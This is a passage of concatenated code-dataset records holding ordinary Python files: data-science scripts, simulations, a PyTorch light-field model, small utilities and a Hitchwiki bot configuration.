+{"seq_id":"516096087","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport xgboost as xgb\nfrom datetime import datetime\nfrom dateutil.parser import parse\nfrom datetime import date\nfrom datetime import time\nimport math\n\npath = 'data/'\ndf = pd.read_csv(path + u'ccf_first_round_user_shop_behavior_train.csv')\nshops = pd.read_csv(path + u'ccf_first_round_shop_info_train.csv')\ntest = pd.read_csv(path + u'evaluation_public.csv')\ndf = pd.merge(df, shops[['shop_id', 'mall_id']], how='left', on='shop_id')\ndf['label'] = 1\ntrain = pd.concat([df, test])\nmall_list = pd.read_csv('data/malls.csv')\nmall_list = list(mall_list['0'])\nresult = pd.DataFrame()\nmall_num = 0\nfor mall in mall_list:\n print(mall_num)\n print(mall)\n train1 = train[train.mall_id == mall].reset_index(drop=True)\n shop = shops[shops.mall_id == mall].reset_index(drop=True)\n l = []\n wifi_dict = {}\n for index, row in train1.iterrows():\n r = {}\n wifi_list = [wifi.split('|') for wifi in row['wifi_infos'].split(';')]\n for i in wifi_list:\n r[i[0]] = int(i[1])\n if i[0] not in wifi_dict:\n wifi_dict[i[0]] = 1\n else:\n wifi_dict[i[0]] += 1\n l.append(r)\n delate_wifi = []\n for i in wifi_dict:\n if wifi_dict[i] < 20:\n delate_wifi.append(i)\n m = []\n for row in l:\n new = {}\n for n in row.keys():\n if n not in delate_wifi:\n new[n] = row[n]\n m.append(new)\n train1 = pd.concat([train1, pd.DataFrame(m)], axis=1)\n list1 = list(train1[train1.shop_id.notnull()].dropna(axis=1, how='all').columns)\n list2 = list(train1[train1.shop_id.isnull()].dropna(axis=1, how='all').columns)\n intersection = list(set(list1).intersection(set(list2)))\n intersection.extend(['shop_id', 'row_id'])\n train1 = train1[intersection]\n\n shop_location = train1[['longitude', 'latitude', 'shop_id']]\n shop_location = shop_location[shop_location.shop_id.notnull()].groupby('shop_id').agg('mean').reset_index()\n shop_location.rename(columns={'longitude': 'r_longitude', 'latitude': 'r_latitude'}, inplace=True)\n shop = shop.merge(shop_location, on='shop_id', how='left')\n from math import radians, cos, sin, asin, sqrt\n\n\n def haversine(lon1, lat1, lon2, lat2):\n \"\"\" \n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees) \n \"\"\"\n\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine公式 \n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371\n return c * r * 1000\n\n\n shop_info_1 = shop[['mall_id', 'longitude', 'latitude']] # 加mall经纬度\n shop_info_1 = shop_info_1.groupby(['mall_id']).agg('mean').reset_index()\n shop_info_1.rename(columns={'longitude': 'mall_longitude', 'latitude': 'mall_latitude'}, inplace=True)\n shop = shop.merge(shop_info_1, on='mall_id', how='left')\n shop['s_m_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), shop['longitude'], shop['latitude'],\n shop['mall_longitude'], shop['mall_latitude']))\n shop = pd.concat([shop, pd.get_dummies(shop['category_id'])], axis=1) #\n\n train1['time_stamp'] = train1['time_stamp'].apply(parse)\n train1['date'] = train1['time_stamp'].apply(datetime.date)\n train1['time'] = train1['time_stamp'].apply(datetime.time)\n train1['day_of_week'] = train1.date.apply(lambda x: date.weekday(x) + 1)\n train1['is_weekend'] = train1.day_of_week.apply(lambda x: 1 if x in (6, 7) else 0)\n\n\n def get_hour(t):\n h, m, s = t.split(':')\n return h\n\n\n train1['hour'] = 
train1['time'].apply(str).apply(get_hour).astype('int')\n\n\n def get_frame(t):\n if t < 11:\n f = 'f_1'\n elif t < 14:\n f = 'f_2'\n elif t < 18:\n f = 'f_3'\n else:\n f = 'f_4'\n return f\n\n\n train1['time_frame'] = train1['hour'].apply(get_frame)\n train1 = pd.concat([train1, pd.get_dummies(train1['time_frame'])], axis=1)\n train1.drop(['time'], axis=1, inplace=True)\n\n\n def get_day(t):\n y, m, d = t.split('-')\n return d\n\n\n train1['day'] = train1['date'].apply(str).apply(get_day).astype('int')\n train1.drop(['date'], axis=1, inplace=True)\n train1.drop(['time_stamp'], axis=1, inplace=True)\n # train_data\n df_train = train1[train1.shop_id.notnull()]\n df_test = train1[train1.shop_id.isnull()].reset_index(drop=True)\n df_train = df_train.reset_index(drop=True)\n df_train = df_train.merge(shop, on='mall_id', how='left')\n df_train['u_s_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_train['longitude_x'], df_train['latitude_x'],\n df_train['longitude_y'], df_train['latitude_y']))\n df_train['u_r_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_train['longitude_x'], df_train['latitude_x'],\n df_train['r_longitude'], df_train['r_latitude']))\n df_train['label'] = list(map(lambda x, y: 1 if (x == y) else 0, df_train['shop_id_x'], df_train['shop_id_y']))\n df_train.drop(['shop_id_x'], axis=1, inplace=True)\n df_train.rename(columns={'shop_id_y': 'shop_id'}, inplace=True)\n df_train = pd.concat([df_train, pd.get_dummies(df_train['shop_id'])], axis=1)\n df_train_neg = df_train[df_train.label == 0]\n df_train_posi = df_train[df_train.label == 1]\n df_train = df_train_posi.append(df_train_neg.groupby('shop_id').apply(\n lambda t: t.sample(int(len(t) * 0.04), axis=0, random_state=1))).reset_index(drop=True)\n\n # 1st train \n params = {\n 'objective': 'binary:logistic',\n 'eta': 0.1,\n 'max_depth': 7,\n 'eval_metric': 'logloss',\n 'seed': 0,\n 'missing': -999,\n 'silent': 1\n }\n feature = [x for x in df_train.columns if\n x not in ['user_id', 'category_id', 'time_frame', 'hour', 'u_s_distance', 'day', 'idx', 'label',\n 'shop_id', 'row_id', 'time_stamp', 'mall_id', 'wifi_infos', 'shop_id', 'mall_latitude',\n 'mall_longitude']]\n xgbtrain = xgb.DMatrix(df_train[feature], df_train['label'])\n # xgbtest = xgb.DMatrix(df_test[feature])\n watchlist = [(xgbtrain, 'train')]\n num_rounds = 500\n model = xgb.train(params, xgbtrain, num_rounds, watchlist, early_stopping_rounds=50)\n\n\n def predict(row):\n xgbtest = xgb.DMatrix(row[feature])\n row['pre_label'] = model.predict(xgbtest)\n return row\n\n\n # xgbtest = xgb.DMatrix(df_train_neg[feature])\n # df_train_neg['pre_label']=model.predict(xgbtest)\n df_train_neg = df_train_neg.groupby('shop_id').apply(predict)\n df_train_neg = df_train_neg[df_train_neg.pre_label > 0.3]\n df_train_neg_1 = df_train_neg[df_train_neg.pre_label > 0.5]\n df_train_neg_2 = df_train_neg[df_train_neg.pre_label > 0.95]\n df_train_posi = df_train_posi.groupby('shop_id').apply(predict)\n df_train_posi = df_train_posi[df_train_posi.pre_label < 0.9]\n # 2nd train \n params = {\n 'objective': 'binary:logistic',\n 'eta': 0.1,\n 'max_depth': 9,\n 'eval_metric': 'auc',\n 'seed': 0, ###\n 'missing': -999,\n 'silent': 1,\n 'subsample': 0.7, #\n 'scale_pos_weight': 4\n }\n df_train_again = pd.concat([df_train, df_train_neg, df_train_posi, df_train_neg_1, df_train_neg_2], axis=0).sample(\n frac=1).reset_index(drop=True)\n xgbtrain = xgb.DMatrix(df_train_again[feature], df_train_again['label'])\n # xgbval = 
xgb.DMatrix(df_train_val[feature],df_train_val['label'])\n watchlist = [(xgbtrain, 'train')]\n num_rounds = 400\n model_again = xgb.train(params, xgbtrain, num_rounds, watchlist, early_stopping_rounds=50)\n\n # validation\n df_test = df_test.merge(shop, on='mall_id', how='left')\n df_test['u_s_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_test['longitude_x'], df_test['latitude_x'],\n df_test['longitude_y'], df_test['latitude_y']))\n df_test['u_r_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_test['longitude_x'], df_test['latitude_x'],\n df_test['r_longitude'], df_test['r_latitude']))\n df_test.drop(['shop_id_x'], axis=1, inplace=True)\n df_test.rename(columns={'shop_id_y': 'shop_id'}, inplace=True)\n df_test = pd.concat([df_test, pd.get_dummies(df_test['shop_id'])], axis=1)\n\n\n def predict_again(row):\n xgbtest = xgb.DMatrix(row[feature])\n row['label'] = model_again.predict(xgbtest)\n return row\n\n\n df_test = df_test.groupby('shop_id').apply(predict_again)\n r = df_test[['row_id', 'shop_id', 'label']]\n r = r.groupby('row_id').apply(lambda t: t[t.label == t.label.max()]).reset_index(drop=True)\n r.drop(['label'], axis=1, inplace=True)\n result = pd.concat([result, r])\n result['row_id'] = result['row_id'].astype('int')\n result.to_csv(path + 'result_negative_mining.csv', index=False)\n mall_num += 1\n","sub_path":"binary_wifi_negative_mining_copy.py","file_name":"binary_wifi_negative_mining_copy.py","file_ext":"py","file_size_in_byte":9186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
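The shop-matching record above computes great-circle distances repeatedly with the haversine formula. Here it is isolated as a stdlib-only sketch with a quick sanity check; the 6371 km mean Earth radius matches the value used in the record:

```python
from math import radians, sin, cos, asin, sqrt


def haversine(lon1, lat1, lon2, lat2):
    """Great-circle distance in meters between two (lon, lat) points."""
    lon1, lat1, lon2, lat2 = map(radians, (lon1, lat1, lon2, lat2))
    dlon, dlat = lon2 - lon1, lat2 - lat1
    a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
    return 2 * asin(sqrt(a)) * 6371 * 1000  # mean Earth radius ~6371 km


print(haversine(0.0, 0.0, 0.0, 0.0))  # 0.0
print(haversine(0.0, 0.0, 0.0, 1.0))  # one degree of latitude, ~111.2 km
```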
+{"seq_id":"267327592","text":"# -*- coding: utf-8 -*-\n\nenum_dict = {}\n\ndef enum(enum_name, val=None, val_name=None, desc=None):\n \n if not enum_dict.has_key(enum_name):\n enum_dict[enum_name] = Enum(enum_name)\n \n if str(val) and val_name and desc:\n enum_dict[enum_name].add(val, val_name, desc)\n \n return enum_dict[enum_name]\n\nclass Enum(object):\n def __init__(self, enum_name):\n self.values = []\n \n def add(self, val, val_name, desc):\n self.values.append(EnumValue(val, val_name, desc))\n\n def __getattr__(self, name):\n for v in self.values:\n if v.name == name: return v\n return None\n \n def value(self, val):\n for v in self.values:\n if v.value == str(val): return v\n return None\n\nclass EnumValue(object):\n def __init__(self, val, val_name, desc):\n self.value = str(val)\n self.name = val_name\n self.desc = desc\n \n def json_dict(self):\n result = {}\n result['id'] = self.value\n result['name'] = self.name\n result['desc'] = self.desc\n return result\n\n#the coding used in client views\nenum('bill_type', \"save_money\", '充值', \"充值\")\nenum('bill_type', \"fetch\", '提取', \"提取\")\nenum('bill_type', \"expense\", 'FB消费', \"FB消费\")\nenum('bill_type', \"transfer\", '转账', \"转账\")\nenum('bill_type', \"check\", '校对', \"校对\")\n\n","sub_path":"python/google_apps/deonwu84/mysite/fb_book/book/enum_code.py","file_name":"enum_code.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"261057960","text":"def today_in_the_history():\n import requests\n import json\n import time\n def func_standard(num):\n if(num<10):\n return \"0\"+str(num)\n else:\n return str(num)\n localtime = time.localtime(time.time())\n tm_mon = func_standard(localtime.tm_mon)\n tm_day = func_standard(localtime.tm_mday)\n today = tm_mon + tm_day\n response = requests.get(\"https://api.qzone.work/api/today.history?date=\" + today)\n result = json.loads(response.text)\n result2 = result[\"data\"][\"list\"]\n return result2\n\nresult2=today_in_the_history()\nfor i in range(len(result2)):\n text=result2[i][\"year\"]+\"年的今天,\"+result2[i][\"title\"]\n\n print(text)","sub_path":"today_in_the_history.py","file_name":"today_in_the_history.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"32242984","text":"import csv\nimport xml.etree.ElementTree as et\n\nwith open('data/2016년 세운산도 DB.txt', 'r') as f:\n with open('result.txt', 'w') as nf:\n reader = csv.DictReader(f, delimiter='\\t')\n for idx, row in enumerate(reader):\n print(row)\n\n # geometry\n tree = et.fromstring(row['geometry'])\n geometry_str = tree.find('./coordinates').text\n lon = geometry_str.split(',')[0]\n lat = geometry_str.split(',')[1]\n\n if idx == 0:\n nf.write(\n 'lon\\tlat\\tcategory\\tname\\tproducts\\tcontact\\taddr_building\\taddr_column\\taddr_floor\\taddr_room\\n'\n )\n\n nf.write(\n '%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n' %\n (lon, lat, row['분류'], row['업체명'], row['취급품목'], row['연락처'], row['상가명'], row['열'], row['층'], row['호수'])\n )\n","sub_path":"store_poi_parser.py","file_name":"store_poi_parser.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"502147726","text":"from sklearn import datasets\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import cross_val_predict\r\nimport matplotlib.pyplot as plt\r\n\r\nimport numpy as np\r\nloaded_data=datasets.load_boston()\r\ndata_X=loaded_data.data\r\ndata_y=loaded_data.target\r\n\r\nX_train,X_test,y_train,y_test=train_test_split(data_X,data_y,test_size=0.2)#训练和测试集划分\r\nmodel=LinearRegression()\r\nmodel.fit(X_train,y_train)\r\nprint(model.coef_)\r\nprint(model.intercept_)\r\n\r\ny_pred=model.predict(X_test)\r\n\r\nprint(\"MSE is:\",metrics.mean_squared_error(y_test,y_pred))#LOSS=MSE均方差\r\n\r\n#10折交叉验证\r\npredicted=cross_val_predict(model,data_X,data_y,cv=10)\r\nprint(\"MSE is(with_cvp):\",metrics.mean_squared_error(data_y,predicted))\r\nplt.scatter(data_y,predicted,color='y',marker='o')\r\nplt.scatter(data_y,data_y,color='g',marker='+')\r\nplt.title('boston_house_price_prediction')\r\nplt.xlabel('real_price')\r\nplt.ylabel('predict_price')\r\nplt.show()\r\n\r\n","sub_path":"linear_regression/linear_regression/boston_sklearn.py","file_name":"boston_sklearn.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"499838030","text":"from ..timeseries import TimeSeries\nfrom ..custom_logging import raise_log, get_logger\nfrom typing import List\nfrom IPython import get_ipython\nfrom tqdm import tqdm, tqdm_notebook\n\nlogger = get_logger(__name__)\n\ndef retain_period_common_to_all(series: List[TimeSeries]) -> List[TimeSeries]:\n \"\"\"\n Trims all series in the provided list, if necessary, so that the return time series have\n the same time index (corresponding to largest duration common to all series).\n\n Raises an error if no such time index exists.\n :param series:\n :return:\n \"\"\"\n\n last_first = max(map(lambda s: s.start_time(), series))\n first_last = min(map(lambda s: s.end_time(), series))\n\n if last_first >= first_last:\n raise_log(ValueError('The provided time series must have nonzero overlap'), logger)\n\n return list(map(lambda s: s.slice(last_first, first_last), series))\n\n\ndef build_tqdm_iterator(iterable, verbose):\n \"\"\"\n Build an iterable, possibly using tqdm (either in notebook or regular mode)\n :param iterable:\n :param verbose:\n :return:\n \"\"\"\n\n def _isnotebook():\n try:\n shell = get_ipython().__class__.__name__\n if shell == 'ZMQInteractiveShell':\n return True # Jupyter notebook or qtconsole\n elif shell == 'TerminalInteractiveShell':\n return False # Terminal running IPython\n else:\n return False # Other type (?)\n except NameError:\n return False # Probably standard Python interpreter\n\n if verbose:\n if _isnotebook():\n iterator = tqdm_notebook(iterable)\n else:\n iterator = tqdm(iterable)\n else:\n iterator = iterable\n return iterator\n\n","sub_path":"u8timeseries/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"408148881","text":"#!/usr/bin/env python3\n\n\nimport numpy as np\nimport logging\nfrom math import pi, sin, cos\n\n# a sample for general alkyl group with methyls\n# tree | branch: [root,branch1,branch2,branch3]\n# or [root,branch1,branch2]\n# or [root,branch1]\n# or [leaf]\n# or leaf\n# 3-methylbutyl : backbone=[\"Ma\",[\"Mb\",[\"Mc\",[\"Md\",\"Me\"]]]]]\n# v1 and v2 must be given as a unit vector.\n\n\ndef alkyl(direction, destination, tree, dest=None):\n \"\"\"\n put a normal-alkyl group rooted at root toward cpos.\n \"\"\"\n logger = logging.getLogger()\n logger.debug(\" {0}\".format(tree))\n # logger.info(\" Put butyl at {0}\".format(molname))\n\n if not isinstance(tree, list):\n tree = [tree]\n\n # v2 is a vector from direction to the destination\n v2 = destination - direction\n v2 /= np.linalg.norm(v2)\n v2d = np.dot(direction, v2)\n while v2d > 0.999:\n # They are inline. It is not safe to determine the orientation.\n v2 = np.random.random(3)\n v2 /= np.linalg.norm(v2)\n v2d = np.dot(direction, v2)\n\n v2 -= v2d * direction\n v2 /= np.linalg.norm(v2)\n\n # v1 is the pivot\n v1 = direction\n\n v3 = np.cross(v1, v2) # the thild unit vector\n\n c = cos(120 * pi / 180)\n s = sin(120 * pi / 180)\n v4 = v2 * c + v3 * s # a branch vector\n v5 = v2 * c - v3 * s # another branch vector\n logger.debug(\" {0} -0.5\".format(np.dot(v2, v4)))\n logger.debug(\" {0} -0.5\".format(np.dot(v4, v5)))\n logger.debug(\" {0} -0.5\".format(np.dot(v5, v2)))\n\n c = cos(109.5 * pi / 180)\n s = sin(109.5 * pi / 180)\n v2 = -v1 * c + v2 * s\n v4 = -v1 * c + v4 * s\n v5 = -v1 * c + v5 * s\n logger.debug(\" {0} 1/3\".format(np.dot(v1, v2)))\n logger.debug(\" {0} 1/3\".format(np.dot(v1, v4)))\n logger.debug(\" {0} 1/3\".format(np.dot(v1, v5)))\n logger.debug(\" {0} 1\".format(np.dot(v2, v2)))\n logger.debug(\" {0} 1\".format(np.dot(v4, v4)))\n logger.debug(\" {0} 1\".format(np.dot(v5, v5)))\n\n #assert False\n atomname = tree[0]\n atoms = [(atomname, np.zeros(3))]\n for vec, topo in zip([v2, v4, v5], tree[1:]):\n atoms += alkyl(vec, destination - v1, topo)\n # untranslation\n atoms = [(atom[0], atom[1] + v1) for atom in atoms]\n\n return atoms\n\n\ndef test():\n logging.basicConfig(level=logging.DEBUG,\n format=\"%(asctime)s %(levelname)s %(message)s\")\n direction = np.array([1.0, 0.0, 0.0]) # must be a unit vector\n destination = np.array([10.0, 10.0, 0.0]) # All the branches direct to this point.\n atoms = alkyl(direction, destination, tree=[\"Ma\", [\"Mb\", \"Mf\", [\"Mc\", \"Me\", [\"Md\", [\"A\", [\"B\", [\"C\", [\"D\"]]]]]]]])\n # in yaplot format\n print(\"t 0 0 0 +\")\n print(\"t\", destination[0], destination[1], destination[2], \"@\")\n for atom in atoms:\n name, pos = atom\n print(\"t\", pos[0], pos[1], pos[2], name)\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"genice/alkyl.py","file_name":"alkyl.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397873688","text":"'''\nCreated on May 9, 2016\n\n@author: itboy\n'''\nimport threading\n\nclass FileTask(threading.Thread):\n def __init__(self,begin,end,f):\n threading.Thread.__init__(self)\n self.begin = begin\n self.end = end\n self.f = f\n \n def run(self):\n for i in range(self.begin,self.end+1):\n self.f.write((str(i)*1000+\"\\r\\n\").encode())\n print(threading.current_thread(),\" \" , str(i))\n\ndef start():\n f = open('test.txt','wb')\n task1 = FileTask(1,100,f)\n task2 = FileTask(101,200,f)\n task1.start()\n task2.start()\n task1.join()\n task2.join()\n f.close()\n\nif __name__ == '__main__':\n start()\n\n","sub_path":"demos/std/threadingdemo/LockDemo.py","file_name":"LockDemo.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"317651477","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 12:38:35 2020\n\n@author: Dvyd\n\"\"\"\n\nimport simpy\nimport numpy as np\nimport random\nimport settings\nfrom esquiador_agrupat import esquiador_agrupat\n\nclass grup_esquiador_setup(object):\n def __init__(self, env):\n self.env = env\n self.action = env.process(self.run())\n \n def grup_esquiador_setup(env, num, telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4):\n count = num\n #while (count < 5):\n num_esquiadors = int(settings.fdistribution_num_esquiadors())\n esqlist = []\n \n for i in range(num_esquiadors):\n esquiador = esquiador_agrupat(env)\n esq = esquiador.esquiador_agrupat(env, '%d-g%d-%d' % (settings.count, count, i+1), telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4)\n settings.count += 1\n setattr(esquiador,'grup', count)\n env.process(esq)\n esqlist.append(esquiador)\n yield env.timeout(0.1)\n \n for j in esqlist:\n setattr(j, 'potPujar', 1)\n \n for j in esqlist:\n while (getattr(j, 'isReady') == 0):\n yield env.timeout(0.1)\n \n for j in esqlist:\n setattr(j, 'potBaixar', 1)\n","sub_path":"grup_esquiador_setup.py","file_name":"grup_esquiador_setup.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"283888750","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nfrom model_utility import *\n\n\nclass Net(nn.Module): \n def __init__(self, opt): \n \n super(Net, self).__init__()\n\n an2 = opt.angular_out * opt.angular_out\n \n # disparity\n self.disp_estimator = nn.Sequential(\n nn.Conv2d(opt.num_source,16,kernel_size=7,stride=1,dilation=2,padding=6),\n nn.ReLU(inplace=True),\n nn.Conv2d(16,32,kernel_size=7,stride=1,dilation=2,padding=6),\n nn.ReLU(inplace=True),\n nn.Conv2d(32,64,kernel_size=5,stride=1,padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,kernel_size=5,stride=1,padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n )\n \n # LF \n self.lf_conv0 = nn.Sequential(\n nn.Conv2d(in_channels=opt.num_source, out_channels=64, kernel_size=3, stride=1, padding=1),\n nn.ReLU(inplace=True),\n )\n self.lf_altblock = make_Altlayer(layer_num=opt.layer_num, an=opt.angular_out, ch=64)\n if opt.angular_out == 9:\n self.lf_res_conv = nn.Sequential(\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(5,3,3), stride=(4,1,1), padding=(0,1,1)),#81->20\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(5,3,3), stride=(3,1,1), padding=(0,1,1)), #20->6\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=81, kernel_size=(6,3,3), stride=(1,1,1), padding=(0,1,1)), #6-->1\n ) \n \n\n if opt.angular_out == 8:\n self.lf_res_conv = nn.Sequential(\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(4,1,1), padding=(0,1,1)),#64-->16\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(4,1,1), padding=(0,1,1)), #16-->4\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(1,1,1), padding=(0,1,1)),#4-->1\n )\n\n if opt.angular_out == 7:\n self.lf_res_conv = nn.Sequential(\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(5,3,3), stride=(4,1,1), padding=(0,1,1)),#49-->12\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(4,1,1), padding=(0,1,1)), #12-->3\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=49, kernel_size=(3,3,3), stride=(1,1,1), padding=(0,1,1)),#3-->1\n ) \n \n \n def forward(self, ind_source, img_source, opt):\n \n an = opt.angular_out\n an2 = opt.angular_out * opt.angular_out\n \n # ind_source \n N,num_source,h,w = img_source.shape #[N,num_source,h,w]\n ind_source = torch.squeeze(ind_source) #[num_source] \n \n #################### disparity estimation ##############################\n disp_target = self.disp_estimator(img_source) #[N,an2,h,w]\n\n #################### intermediate LF ##############################\n warp_img_input = img_source.view(N*num_source,1,h,w).repeat(an2,1,1,1) #[N*an2*4,1,h,w]\n \n grid = []\n for k_t in range(0,an2):\n for k_s in range(0,num_source):\n ind_s = ind_source[k_s].type_as(img_source)\n ind_t = torch.arange(an2)[k_t].type_as(img_source)\n ind_s_h = torch.floor(ind_s/an)\n ind_s_w = ind_s % an\n ind_t_h = torch.floor(ind_t/an)\n ind_t_w = ind_t % an \n disp = disp_target[:,k_t,:,:]\n \n XX = 
torch.arange(0,w).view(1,1,w).expand(N,h,w).type_as(img_source) #[N,h,w]\n YY = torch.arange(0,h).view(1,h,1).expand(N,h,w).type_as(img_source) \n grid_w_t = XX + disp * (ind_t_w - ind_s_w)\n grid_h_t = YY + disp * (ind_t_h - ind_s_h)\n grid_w_t_norm = 2.0 * grid_w_t / (w-1) - 1.0\n grid_h_t_norm = 2.0 * grid_h_t / (h-1) - 1.0 \n grid_t = torch.stack((grid_w_t_norm, grid_h_t_norm),dim=3) #[N,h,w,2] \n grid.append(grid_t) \n grid = torch.cat(grid,0) #[N*an2*4,h,w,2]\n \n warped_img = functional.grid_sample(warp_img_input,grid).view(N,an2,num_source,h,w)\n\n ################# refine LF ###########################\n feat = self.lf_conv0(warped_img.view(N*an2,num_source,h,w)) #[N*an2,64,h,w]\n feat = self.lf_altblock(feat) #[N*an2,64,h,w]\n feat = torch.transpose(feat.view(N,an2,64,h,w),1,2) #[N,64,an2,h,w]\n res = self.lf_res_conv(feat) #[N,an2,1,h,w]\n \n lf = warped_img[:,:,0,:,:] + torch.squeeze(res,2) #[N,an2,h,w] \n \n return warped_img, disp_target, lf\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
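The warping core of the light-field model above is `functional.grid_sample` with sampling grids normalized to [-1, 1], exactly the `2.0 * x / (w-1) - 1.0` mapping it computes. A minimal demo (assumes torch >= 1.10 for the `indexing=` keyword) showing that an identity grid reproduces the input under `align_corners=True`:

```python
import torch
import torch.nn.functional as functional

N, C, H, W = 1, 1, 4, 4
img = torch.arange(H * W, dtype=torch.float32).view(N, C, H, W)

ys, xs = torch.meshgrid(torch.arange(H), torch.arange(W), indexing='ij')
grid_x = 2.0 * xs / (W - 1) - 1.0   # same normalization as the model
grid_y = 2.0 * ys / (H - 1) - 1.0
grid = torch.stack((grid_x, grid_y), dim=2).unsqueeze(0).float()  # [N,H,W,2]

out = functional.grid_sample(img, grid, align_corners=True)
print(torch.allclose(out, img))     # True: identity warp
```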
+{"seq_id":"20955346","text":"# -*- coding: utf-8 -*-\nimport family, config\n\n# www.hitchwiki.org \n\nclass Family(family.Family):\n def __init__(self):\n family.Family.__init__(self)\n self.name = 'hitchwiki'\n self.langs = {\n 'en': 'hitchwiki.org',\n 'es': 'hitchwiki.org',\n 'fr': 'hitchwiki.org',\n 'de': 'hitchwiki.org',\n 'ru': 'hitchwiki.org',\n 'fi': 'hitchwiki.org',\n 'pt': 'hitchwiki.org',\n 'bg': 'hitchwiki.org',\n 'zh': 'hitchwiki.org',\n 'pl': 'hitchwiki.org',\n 'tr': 'hitchwiki.org',\n 'nl': 'hitchwiki.org',\n 'ro': 'hitchwiki.org',\n 'he': 'hitchwiki.org',\n 'hr': 'hitchwiki.org',\n }\n self.namespaces[1] = {\n '_default': u'Talk',\n 'ar': u'نقاش',\n 'ca': u'Discussió',\n 'de': u'Diskussion',\n 'eo': u'Diskuto',\n 'es': u'Discusión',\n 'fi': u'Keskustelu',\n 'fr': u'Discuter',\n 'he': u'שיחה',\n 'hi': u'वार्ता',\n 'hu': u'Vita',\n 'it': u'Discussione',\n 'ja': u'ノート',\n 'ko': u'토론',\n 'nl': u'Overleg',\n 'pl': u'Dyskusja',\n 'pt': u'Discussão',\n 'ro': u'Discuţie',\n 'ru': u'Обсуждение',\n 'sv': u'Diskussion',\n 'bg': u'Беседа',\n 'tr': u'Tartışma',\n }\n self.namespaces[2] = {\n '_default': u'User',\n 'de': u'Benutzer',\n 'es': u'Usuario',\n 'fr': u'Utilisateur',\n 'fi': u'Käyttäjä',\n 'nl': u'Gebruiker',\n 'pl': u'Użytkownik',\n 'pt': u'Usuário',\n 'ro': u'Utilizator',\n 'ru': u'Участник',\n 'sv': u'Användare',\n 'bg': u'Потребител',\n 'tr': u'Kullanıcı',\n }\n\n self.namespaces[4] = {\n '_default': u'Hitchwiki',\n 'de' : u'Tramperwiki',\n 'es' : u'Autostopwiki',\n 'tr' : u'Otostopviki',\n 'fi' : u'Liftariwikiin',\n 'pl' : u'Autostopwiki',\n 'pt' : u'CaronaWiki',\n\n }\n self.namespaces[5] = {\n '_default': u'Hitchwiki talk',\n 'de' : u'Tramperwiki Diskussion',\n 'fr' : u'Discussion Hitchwiki',\n 'pl' : u'Dyskusja Autostopwiki',\n 'pt' : u'CaronaWiki Discussão',\n 'ru' : u'Обсуждение Hitchwiki',\n 'tr' : u'Otostopviki tartışma',\n 'bg' : u'Hitchwiki 